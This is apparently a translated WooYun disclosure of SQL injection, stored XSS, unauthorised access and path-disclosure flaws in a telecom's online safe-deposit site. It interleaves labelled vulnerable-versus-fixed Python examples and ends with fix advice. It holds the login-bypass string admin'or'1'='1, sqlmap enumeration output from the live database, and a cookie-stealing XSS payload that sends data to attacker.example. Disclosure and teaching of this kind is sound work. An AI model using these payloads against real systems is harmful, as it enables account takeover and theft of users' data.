
Vulnerability summary

Defect ID: wooyun-2014-074594

Title: A China Unicom provincial branch's online safe-deposit system has SQL injection and XSS vulnerabilities; over 70,000 users across the province currently use it

Vendor: a China Unicom provincial branch

Author: cf_hb

Submitted: 2014-09-02 10:41

Fix time: 2014-10-17 10:42

Public disclosure: 2014-10-17 10:42

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-09-02: Details sent to the vendor, awaiting the vendor's response
2014-09-07: Vendor confirmed; details visible to the vendor only
2014-09-17: Details disclosed to core white hats and relevant domain experts
2014-09-27: Details disclosed to regular white hats
2014-10-07: Details disclosed to intern white hats
2014-10-17: Details disclosed to the public

Brief description:

It is now 3:35 Beijing time; I have been testing since 9:30. I found quite a few security problems and am trying to finish writing within an hour so I can get some sleep!

Details:

Identity: China United Network Communications Co., Ltd., Jilin Provincial Branch
Domain: www.m10060.com
Screenshots as proof:

[Screenshot: index.PNG]


Summary of the findings, ordered by severity:
Issue 1: Multiple SQL injection points; the universal password a'or'1'='1 logs into the system
Issue 2: A stored XSS in the SMS favorites module, usable to steal any user's cookie
Issue 3: Unauthorized access to directories and back-office pages, and source code disclosure
Issue 4: Unhandled error messages on server faults expose absolute paths
Issue 5: The management back office does not mask user information; an administrator can directly view any user's account, password and other details
Now each issue is described and demonstrated in turn.
Issue 1:
Multiple SQL injection points; the universal password a'or'1'='1 logs into the system
Universal password login: admin'or'1'='1

[Screenshot: sql.PNG]
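Why the universal password works, as an added example that is not part of the original report or the site's code. It reproduces the login check with a string-concatenated query (the vulnerable form) beside a parameterized one, on an in-memory SQLite table. The table name `manager`, its columns and the rows are constructed assumptions; the report does not show the real schema. The precedence argument is the same on the Microsoft SQL Server 2000 backend the report identifies.

```python
import sqlite3

# Constructed stand-in for the back-office login table. Table and column
# names are assumptions; the report does not show the real schema.
SAMPLE_MANAGERS = [
    ("admin", "S3cret!Admin"),
    ("ops", "ops-pass"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE manager (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO manager VALUES (?, ?)", SAMPLE_MANAGERS)
    return conn


def show_query(username, password):
    """The SQL text the vulnerable path actually executes."""
    return ("SELECT username FROM manager WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    """Login as the vulnerable site behaves: the query is built by string
    concatenation, so a quote in either field ends the literal and the rest
    of the input is parsed as SQL. Returns the matched username or None."""
    row = conn.execute(show_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: the input reaches the engine as
    data and can never change the structure of the query."""
    sql = "SELECT username FROM manager WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "admin'or'1'='1"
    print(show_query("x", payload))
    # WHERE (username='x' AND password='admin') OR '1'='1'  -> every row matches
    print("vulnerable:", login_vulnerable(conn, "x", payload))
    print("fixed:     ", login_fixed(conn, "x", payload))
```

AND binds tighter than OR, so the payload in the password field turns the WHERE clause into `(... AND ...) OR '1'='1'`, every row matches, and `fetchone()` returns whichever row the engine emits first, typically the first row in the table, which in most back offices is an administrator. In the username field the same string yields `username='admin' OR ('1'='1' AND password='...')`, which matches admin whatever the password is. With bound parameters both inputs are compared as literal strings and neither matches anything.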


Login URLs. The first URL, tested with the universal password bypass:
http://www.m10060.com/common/manager/
Into the management back office:

[Screenshot: 绕过.PNG]

[Screenshot: 后台.PNG]


72073 user records:

[Screenshot: 7万.PNG]

Looking at the unmasked user information:

[Screenshot: inf.PNG]

User account and password information:

[Screenshot: pas.PNG]

Logging in with a user's account:

[Screenshot: 登陆用户保管箱.PNG]


This demonstrates that user information is not masked and that the back-office login can be bypassed, exposing 72073 user accounts, which can then be used to log in and operate on the data those users keep in their online safe-deposit boxes. The second URL:
http://www.m10060.com/common/phone/login.jsp
This one is opened by the mobile client; visiting it directly on a PC redirects you to the home page!
Here is how I got around it. First, capture the traffic:

[Screenshot: jump.PNG]

[Screenshot: whyYoujump.jpg]

Knowing the cause, I used Burp Suite's automatic match/replace on the response stream to strip out that JavaScript snippet:

[Screenshot: no-jump.jpg]
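The redirect bypass described above, as an added example that is not part of the original report. The page's real script is only visible in the screenshots, so the `LOGIN_PAGE` markup, the `Android|iPhone` User-Agent test and the handler names are constructed assumptions. `strip_client_redirect` does what the Burp match/replace rule did; `serve_login_gated` shows the same decision made server-side, together with the caveat that a User-Agent check is not a security boundary either.

```python
import re

# Constructed approximation of a login page that sends non-mobile browsers
# away with JavaScript. The real page's script is only shown in the
# report's screenshots, so this markup is an assumption.
LOGIN_PAGE = """<html><head><title>login</title>
<script type="text/javascript">
if (!/Android|iPhone/.test(navigator.userAgent)) { window.location.href = "/"; }
</script>
</head><body>
<form action="login.jsp" method="post">
<input name="username"><input name="password" type="password">
</form></body></html>"""

# A <script> element whose body performs the redirect.
REDIRECT_SCRIPT = re.compile(
    r"<script[^>]*>.*?window\.location\.href.*?</script>", re.S | re.I)

MOBILE_UA = re.compile(r"Android|iPhone")


def has_client_redirect(body):
    """True if the response still carries the client-side redirect."""
    return REDIRECT_SCRIPT.search(body) is not None


def strip_client_redirect(body):
    """The proxy match/replace rule as a function: delete the redirect
    script from the response so the browser simply renders the form."""
    return REDIRECT_SCRIPT.sub("", body)


def serve_login_vulnerable(user_agent):
    """Server-side view of the original behaviour: the form is returned to
    every client and only the browser is asked to navigate away. Anyone who
    can edit the response (a proxy, the browser's dev tools, curl) sees
    the form and can post to login.jsp."""
    return 200, LOGIN_PAGE


def serve_login_gated(user_agent):
    """The decision moved server-side: non-mobile clients receive a 302 and
    the form body never leaves the server. This restores what the page meant
    to do, but User-Agent is attacker-controlled, so it is not a security
    boundary: login.jsp itself must be injection-safe and authenticate
    properly whatever client reaches it."""
    if not MOBILE_UA.search(user_agent or ""):
        return 302, ""
    return 200, strip_client_redirect(LOGIN_PAGE)


if __name__ == "__main__":
    desktop = "Mozilla/5.0 (Windows NT 6.1) Firefox/31.0"
    status, body = serve_login_vulnerable(desktop)
    print(status, has_client_redirect(body))                 # 200 True
    print(has_client_redirect(strip_client_redirect(body)))  # False
    print(serve_login_gated(desktop)[0])                     # 302
```

The takeaway for the defender is that anything enforced only in JavaScript the attacker receives is advisory: the server answered the request with the full form, so the "mobile only" page was reachable from any client, and the injection behind it was reachable too.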


I wanted to know whether this one was unfiltered as well, so I captured the request and tested it with sqlmap:
Database type (Microsoft SQL Server 2000; its extended support ended in April 2013):
DBMS: Microsoft SQL Server 2000
Databases:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] wo
[*] ymaildb
Database: wo
[4 tables]
+--------------------+
| dbo.UserOrder |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------+
Database users:
database management system users [4]:
[*] BUILTIN\\Administrators
[*] sa
[*] wodb
[*] ymaildb
Current user:
current user: 'ymaildb'
Current database:
current database: 'ymaildb'
The current database has over 920 tables; a partial list of table names follows (non-ASCII characters in several names were lost in extraction and appear as "?"):
"dbo.mz_msg"
"dbo.mz_dict"
"dbo.mz_content"
"dbo.mz_sendcycle"
"dbo.mz_friend"
"dbo.mz_item"
"dbo.mz_sendmsg"
"dbo.mz_msg_log"
"dbo.mz_sendlimit"
"dbo.mz_sendmsg_item"
"dbo.mz_sms_mo_log"
"dbo.mz_sms_mo_log_backup"
"dbo.mz_sms_mo"
"dbo.mz_seqinfo"
"dbo.mz_smsflow"
"dbo.mz_sendmsg_log"
"dbo.MZ_SMS_MT_LOG_BACKUP"
"dbo.mz_smsflow_conf"
"dbo.mz_smsflow_mt"
"dbo.mz_sms_mt"
"dbo.mz_sms_mt_log"
"dbo.mz_smsservice"
"dbo.mz_subitem_bak"
"dbo.mz_smsqcdz"
"dbo.mz_subuserreginfo"
"dbo.mz_td"
"dbo.mz_subuserreginfo_bak"
"dbo.mz_subitem"
"dbo.mz_unuserreginfo"
"dbo.mz_smsqcdz_new"
"dbo.mz_usersms"
"dbo.mz_temp"
"dbo.mz_useractinfo"
"dbo.mz_userreginfo"
"dbo.mz_workflow"
"dbo.mz_userstat"
"dbo.nmyj_not_billusers"
"dbo.temp_20130206_???????366?"
"dbo.temp_20130201_???????"
"dbo.temp_20130306_??G?"
"dbo.temp_20130319_????G???"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130604_??????????(201209-201305)"
"dbo.temp_20130408_?????G???"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130613_??????100?"
"dbo.temp_20130618_??6?????"
"dbo.temp_20130409_??G??????"
"dbo.temp_20130826_????6"
"dbo.temp_20130613_??5?????"
"dbo.temp_20130911_????"
"dbo.temp_20130911_????"
"dbo.temp_20130902_??8????????"
"dbo.temp_20131022_1133_ftp????"
"dbo.temp_20130922"
"dbo.temp_20131022_1133_??????"
"dbo.temp_20140604"
"dbo.temp_20131023_1125"
"dbo.temp_20131206_??"
"dbo.temp_20140328"
"dbo.temp_20140721_G"
"dbo.temp_lN_all"
"dbo.temp_20140721_0024"
"dbo.temp_6????????_20120710"
"dbo.temp_ln_as_20130922"
"dbo.temp_ln_20140326_g"
"dbo.temp_20140722_0415_201303"
"dbo.temp_20140722_0415G"
"dbo.temp_LN_PSTN_20120712"
"dbo.temp_ln201305???????"
"dbo.temp_ln_dl_20130922"
"dbo.temp_??_??_?????????"
"dbo.temp_????????_20110522"
"dbo.temp_??_??_??????"
"dbo.temp_??_????"
"dbo.temp_???????G?201206????"
"dbo.temp_????????201204"
"dbo.temp_????????201206?201204??"
"dbo.temp_??_??G??"
"dbo.trust_bath_interface"
"dbo.two"
"dbo.temp_????????201206"
"dbo.temp_??????267?_20110421"
"dbo.TY4YX_?????2?"
"dbo.user_lottery"
"dbo.userbaseinfo"
"dbo.undelive_20080630"
"dbo.undelive_20071227"
"dbo.usermailindex"
"dbo.TY2YX_??????"
"dbo.user_lot"
"dbo.usercalloutrecord"
"dbo.users"
"dbo.userreginfo"
"dbo.usermoney"
"dbo.undelive_20071202"
"dbo.users_20081220_bak"
"dbo.users_20080604"
"dbo.users_20081212"
"dbo.users_fee_success_200612"
"dbo.users_defined_message"
"dbo.users_fee_success"
"dbo.users_delmail_logs"
"dbo.users_fixed"
"dbo.users_action"
"dbo.users_itinerary_remind"
"dbo.users_bath_dredge_20080414"
"dbo.users_bak_20120329"
"dbo.users_initpwd_record"
"dbo.users_jl_cncself_20080710"
"dbo.users_jl_cncself"
"dbo.users_jl_taihua"
"dbo.users_ln_0427bill1"
"dbo.users_ln_0427new1users"
"dbo.users_ln_bath_11"
"dbo.users_ln_cncself"
"dbo.users_ln_cncself_024bill"
"dbo.users_ln_cncself_024bill2"
I tried dumping one table's columns and data; it was a bit slow, so I did not wait for it to finish:
fetching columns for table 'users' in database 'ymaildb'
the SQL query used returns 42 entries
starting 10 threads
retrieved: "acct_id","decimal"
retrieved: "createdDate","varchar"
retrieved: "call_assistant","char"
retrieved: "addOldMail","int"
retrieved: "answer","varchar"
retrieved: "areacode","varchar"
retrieved: "curfaxn","int"
retrieved: "curmailn","int"
retrieved: "bath_dredge","char"
retrieved: "alias","varchar"
retrieved: "curmsgn","int"
retrieved: "curudisksize","int"
retrieved: "curSize","real"
retrieved: "forwardDestination","varchar"
retrieved: "domainName","varchar"
retrieved: "curvoicen","int"
retrieved: "grade","smallint"
retrieved: "mailDir","varchar"
retrieved: "itemCount","int"
retrieved: "logintimes","int"
retrieved: "lastLoginDate","varchar"
retrieved: "maxFaxTime","int"
retrieved: "popFirst","int"
retrieved: "ppwd","varchar"
retrieved: "reMailSign","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "pwdAlgorithm","varchar"
retrieved: "setDX","varchar"
retrieved: "pwdHash","varchar"
retrieved: "requestName","char"
retrieved: "state","smallint"
retrieved: "terminal_type","varchar"
retrieved: "type","char"
retrieved: "useAlias","smallint"
retrieved: "usedFaxTime","int"
retrieved: "user_type","varchar"
retrieved: "username","varchar"
retrieved: "useForwarding","smallint"
retrieved: "usercode","varchar"
retrieved: "userid","int"
retrieved: "whether_billing","int"
retrieved: "question","varchar"
fetching entries for table 'users' in database 'ymaildb'
fetching number of distinct values for column 'ppwd'
fetching number of distinct values for column 'type'
fetching number of distinct values for column 'alias'
fetching number of distinct values for column 'grade'
fetching number of distinct values for column 'setDX'
fetching number of distinct values for column 'state'
fetching number of distinct values for column 'answer'
fetching number of distinct values for column 'userid'
using column 'userid' as a pivot for retrieving row data
This proves the SQL injection vulnerability!
Issue 2:
A stored XSS in the SMS favorites module, usable to steal any user's cookie.
I came across this by accident while browsing through the directories and files:

[Screenshot: info.jpg]

Before, it looked like this:

[Screenshot: 越权.PNG]

Because the add form for that tag has a length limit, I edited it, then intercepted and modified the request:

[Screenshot: edite_XSS.PNG]

Then it was added successfully:

[Screenshot: 越权添加.PNG]

Then open the SMS favorites module:

[Screenshot: xss-短信.jpg]

It popped up as soon as the module opened!
That completes the stored XSS proof!
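The two defects behind this finding, a length limit enforced only in the browser and stored text written back into the page unencoded, as an added example that is not the site's code. The "tag" field name, the 20-character limit and the payload are constructed for the illustration; the report does not show the real form. The vulnerable store/render pair is placed beside the server-validated, output-encoded pair.

```python
import html

# Constructed limit for the "tag" field; the real form's maxlength is not
# stated in the report.
MAX_TAG_LEN = 20

# Constructed payload of the kind a cookie-stealing stored XSS would carry.
PAYLOAD = ("<img src=x onerror=\"new Image().src="
           "'http://attacker.example/?c='+document.cookie\">")


class ValidationError(ValueError):
    pass


def save_tag_vulnerable(store, user, tag):
    """Stores whatever arrives. The length limit lived only in the HTML form
    (maxlength), so a request edited in an intercepting proxy skips it."""
    store.setdefault(user, []).append(tag)
    return True


def save_tag_fixed(store, user, tag):
    """Server-side validation: the limit is enforced where it cannot be
    skipped. This alone does not stop XSS (short payloads exist); it only
    removes the 'edit the request' step and bounds what gets stored."""
    if not (1 <= len(tag) <= MAX_TAG_LEN):
        raise ValidationError("tag must be 1-%d characters" % MAX_TAG_LEN)
    store.setdefault(user, []).append(tag)
    return True


def render_favorites_vulnerable(tags):
    """Concatenates stored text straight into the page, so the payload
    executes for every user who opens the module."""
    return "<ul>" + "".join("<li>" + t + "</li>" for t in tags) + "</ul>"


def render_favorites_fixed(tags):
    """HTML-encodes on output: the same stored text is shown as text.
    quote=True also encodes quotes, which matters inside attributes."""
    return ("<ul>" + "".join("<li>" + html.escape(t, quote=True) + "</li>"
                             for t in tags) + "</ul>")


if __name__ == "__main__":
    store = {}
    save_tag_vulnerable(store, "victim", PAYLOAD)
    print(render_favorites_vulnerable(store["victim"]))
    print(render_favorites_fixed(store["victim"]))
```

Output encoding is the control that actually closes the hole; the server-side length check is defence in depth. Marking the session cookie HttpOnly additionally keeps `document.cookie` from exposing it to a script that does get through.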
Issue 3:
Unauthorized access to directories and back-office pages, and source code disclosure.
Straight to the screenshots:

[Screenshot: 1.PNG]

[Screenshot: 2.PNG]

[Screenshot: 4.PNG]

[Screenshot: source.PNG]

Issue 4:
Unhandled error messages on server faults expose absolute paths.

[Screenshot: 3.PNG]

Screenshot from the mobile client:

[Screenshot: QQ图片20140901032808.jpg]

That's about it! It is now 4:37 Beijing time. So sleepy...

Proof of vulnerability:

See above.

Fix recommendations:

1. Strictly validate user-supplied parameters on input and encode on output (parameterized queries for SQL, HTML encoding for page content)
2. Change the server configuration so that unauthorized users cannot reach back-office pages and directories.
3. Do not display raw error messages in the browser
4. Mask user information in the management back office; at the very least, passwords must not be shown in plaintext!
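Recommendation 4 in working form, as an added example that is not part of the report or the site's code: store passwords as a salted, iterated hash, verify them without ever reading the plaintext back, and mask personal data before it reaches a back-office screen. The sqlmap column list above shows the `users` table carrying `ppwd` next to `pwdHash`/`pwdAlgorithm`; this example assumes the hash field is the only one kept. The record layout, the 11-digit phone format and the PBKDF2 iteration count are constructed choices.

```python
import hashlib
import hmac
import os

# Iteration count is a constructed choice for this example; raise it as
# hardware allows.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Return a self-describing string: algorithm$iterations$salt$hash.
    A fresh random salt per user means equal passwords get different hashes,
    so a leaked table cannot be cracked once for everyone."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count and compare in
    constant time. The plaintext is never stored, so no screen can show it."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def mask_phone(number):
    """Keep the first 3 and last 4 digits (enough for an operator to confirm
    a caller) and star out the rest; very short values are fully masked."""
    if len(number) <= 7:
        return "*" * len(number)
    return number[:3] + "*" * (len(number) - 7) + number[-4:]


def admin_view(record):
    """What the back-office user list should expose: no password field at
    all, not even the hash, and the phone number masked."""
    return {"username": record["username"], "phone": mask_phone(record["phone"])}


if __name__ == "__main__":
    # Constructed record; not data from the real system.
    user = {"username": "alice", "phone": "13800001234",
            "password_hash": hash_password("correct horse")}
    print(verify_password("correct horse", user["password_hash"]))  # True
    print(admin_view(user))
```

Password resets then issue a new credential rather than reading the old one back, which removes the reason an administrator screen would ever need the password column in the first place.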

Copyright notice: please credit the source, cf_hb@WooYun, when reposting


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2014-09-07 09:22

Vendor reply:

Latest status:

None

